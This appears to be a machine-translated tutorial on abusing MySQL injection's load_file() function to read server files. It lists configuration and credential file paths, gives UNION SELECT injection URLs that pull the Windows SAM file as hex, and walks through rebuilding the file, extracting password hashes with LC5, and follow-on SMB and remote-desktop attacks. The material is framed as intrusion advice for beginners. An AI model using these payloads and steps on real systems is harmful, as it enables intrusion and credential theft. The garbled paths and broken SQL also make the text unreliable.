Load_file () read SAM Value

In MYSQL injection, the load_file () function plays an important role in obtaining webshell and Elevation of Privilege. It is often used to read various configuration files, such:
/Usr/local/app/apache2/conf/httpd. conf // default configuration file of apache2
/Usr/local/apache2/conf/httpd. conf
/Usr/local/app/apache2/conf/extra/httpd-vhosts.conf // virtual website settings
/Usr/local/app/php5/lib/php. ini // PHP related settings
/Etc/sysconfig/iptables // obtain the firewall rule policy
/Etc/httpd/conf/httpd. conf // apache configuration file
/Etc/rsyncd. conf // synchronization program configuration file
/Etc/sysconfig/network-scripts/ifcfg-eth0 // view IP.
/Etc/my. cnf // mysql configuration file
/Etc/redhat-release // System Version
/Etc/issue
/Etc/issue.net
C: mysqldatamysqluser. MYD // store the database connection password in the mysql. user table
C: Program FilesRhinoSoft. comServ-UServUDaemon.ini // stores the VM website path and password
C: Program FilesServ-UServUDaemon.ini
C: windowsmy. ini // MYSQL configuration file
C: windowssystem32inetsrvMetaBase. xml // IIS configuration file

And so on. In fact, load_file () is not only used to read binary files in the system,

C: windowsepairsam // stores the password for the first installation of WINDOWS.
C: Program Files Serv-UServUAdmin.exe // versions earlier than 6.0 serv-U administrator password stored here
C: Program FilesRhinoSoft.comServUDaemon.exe
C: Documents and SettingsAll UsersApplication DataSymantecpcAnywhere *. cif File
// Stores the pcAnywhere Login Password

And other sensitive files are listed here.

If the MYSQL account has high permissions, The load_file () function can read any file theoretically, but because the browser encoding cannot completely display Binary-encoded files, it is impossible to put load_file () binary files are stored and used. In fact, this problem can be easily solved. As long as the hex () function is used to convert the binary file read by the load_file () function into a hexadecimal system, the binary file can be fully displayed on the webpage in hexadecimal encoding format. Copy the hexadecimal code, edit it in the hexadecimal file editor, and save it to get the complete binary file.

The following is an example:
The target server is the win2003 system, which has the root permission injection point and the read permission. See figure 1.

 

Load_file () reads the c: windowsepairsam file of the target server. If the Administrator does not change the password after the windows system is installed, the windows user password on the target server is expected to be obtained. Structure

Http://www.site.com/mulu/pf.php? Id = 59/**/and/**/1 = 2/**/union/**/select, replace (load_file (char (92,119,105,110,100,111,119,115, 92,114,101,112, 97,105,114, 92,115, 97,109,), 60

, 32), 29, 30 /*

(Note: (char (92,119,105,110,100,111,119,115, 92,114,101,112, 97,105,114, 92,115, 97,109,) is the ASC code of c: windowsepairsam)

Expected result 2 is displayed as a garbled sam file.

In windows, the information in the sam file is encrypted. Generally, the editor cannot directly read the information, and nothing can be seen except garbled characters.

After the hex () function is added, the link is

Http://www.site.com/mulu/pf.php? Id = 59/**/and/**/1 = 2/**/union/**/select, hex (replace (load_file (char (92,119,105,110,100,111,119,115, 92,114,101,112, 97,105,114, 92,115, 97,109), 6

/*

The result is the hexadecimal sam file content shown in figure 3.

Copy the hexadecimal code, open the Hex Workshop in the hexadecimal editor, and click File-New in sequence (figure 4)

 

Click Edit-Special paste (figure 5)

Select the CF_TEXT option and the hexadecimal string option. (Figure 6)

Click paste to obtain the screen 7.

Click "Save as" and save all files (figure 8) to get the complete sam file.

Then use LC5 to import the sam file (figure 9)

Obtain the password HASH. (Figure 10)

Subsequent attacks:
If the other party enables port 139/445, you can try to use the obtained password HASH for SMB attacks.
If the other party enables port 3389, you can try to crack the obtained password HASH to obtain the password for remote login.

The role of Load_file () in intrusion has its own limitations. If it can be used in combination with various directory traversal vulnerabilities, it is often miraculous.
This article has no technical skills, but provides ideas and hopes to be useful to new friends.